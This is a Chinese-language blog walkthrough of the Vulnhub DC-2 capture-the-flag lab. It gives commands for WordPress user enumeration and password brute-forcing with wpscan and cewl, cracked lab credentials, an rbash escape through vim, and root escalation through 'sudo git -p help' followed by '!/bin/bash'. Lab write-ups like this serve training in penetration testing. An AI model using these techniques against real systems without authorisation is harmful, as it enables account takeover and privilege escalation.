Loading

Vulnhub DC-2

Vulnhub DC-2

简介

DC-2是一个专门建造的易受攻击的实验室,目的是获得渗透测试领域的经验。

它是为初学者设计的一个挑战,但它到底有多容易将取决于你的技能和知识,以及你的学习能力。

要成功地完成这一挑战,您将需要Linux技能、熟悉Linux命令行和基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。

有多种获取根目录的方法,但是,我包含了一些包含初学者线索的标志。

总共有五个标志,但最终目标是在root的主目录中找到并读取该标志。您甚至不需要是root用户才能执行此操作,但是,您将需要root权限。

根据你的技能水平,你可以跳过找到这些标志的大部分,直接去找根。

初学者可能会遇到他们以前从未遇到过的挑战,但谷歌搜索应该是获得完成此挑战所需信息的全部必要条件。

靶机探测

netdiscover

image-20201111091549092

访问192.168.38.134

image-20201111091753093

提示不能连接到dc-2 修改hosts

vim /etc/hosts

image-20201111092433389

成功访问

image-20201111092714785

image-20201111102836692

得到flag1 提示使用cewl账户的登录

识别指纹

使用Wappalyzer识别指纹

image-20201111092832188

cms为wordpress

下载wordpress扫描器 wpscan

gem install wpscan

image-20201111095932214

wpscan --url http://dc-2/

image-20201111100555243

探测到wordpress版本为 4.7.10

爆破用户

但是根据前面的提示告诉可以爆破登录用户

wpscan --url http://dc-2/ -e u

image-20201111104148771

得到 3个用户

使用cewl生成字典

cewl http://dc-2 -w 1.txt

image-20201111104632701

wpscan --url http://dc-2 -U u.txt -P 1.txt

image-20201111105052467

得到两个账号

jerry / adipiscing tom / parturient

在http://dc-2/wp-login.php登录

登录jerry进入后台 得到flag2

image-20201111105934445

试了几个搜到的洞都没有什么效果 看了下wp

端口扫描

扫描开放端口

nmap 192.168.38.134 -v-

image-20201111110946285

探测服务

namp -sV -p 7744 192.168.38.134

image-20201111111231606

可得知7744端口为ssh服务

image-20201111111841944

成功登录tom

得到flag3

image-20201111112201006

绕过rbash

提示 Tom可能有su权限

查看/etc/passwd

image-20201111112540638

查看环境变量

image-20201111113424320

使用vim绕过rbash

vim
:set shell=/bin/bash
:shell

image-20201111113627232

在/home/jerry中找到flag4

image-20201111113938224

git提权

提示使用git提权

将/user/bin加入环境变量

export PATH=$PATH:/bin/:/usr/bin:$PATH

查看tom sudo能使用的命令

image-20201111125006299

需要密码 切换到jerry

image-20201111125114057

提示能使用git

image-20201111125324618

其中 -p|--paginate 中-p的意思就以分页的形式展示git的帮助信息,并且默认使用的是more,原理就和more提权是相似的了

sudo git -p help 或者 sudo git help config

然后输入 !/bin/bash

image-20201111125914396

成功提权

image-20201111130206707

在root目录得到flag

posted @ 2020-11-15 23:55  Th0r  阅读(94)  评论(0编辑  收藏  举报